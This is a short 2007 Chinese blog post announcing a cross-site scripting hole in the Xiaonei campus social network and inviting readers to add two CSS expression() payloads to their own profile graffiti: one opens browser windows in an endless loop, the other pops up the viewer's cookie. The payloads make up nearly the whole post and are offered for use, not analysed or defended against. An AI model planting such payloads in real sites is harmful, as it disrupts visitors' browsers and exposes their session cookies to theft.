2007年1月26日星期五

校内网重大漏洞

XSS的跨站

如下语句加入到自己的涂鸦里去 ,
<DIV STYLE="width: expression(window.open('http://www.baidu.com'));">
这句会弹出窗口,死循环
<DIV STYLE="width: expression(alert(document.cookie));">
这句弹出你的cookie
 
spark
2007-01-26
发帖者 时间:

没有评论:

发表评论

订阅: 博文评论 (Atom)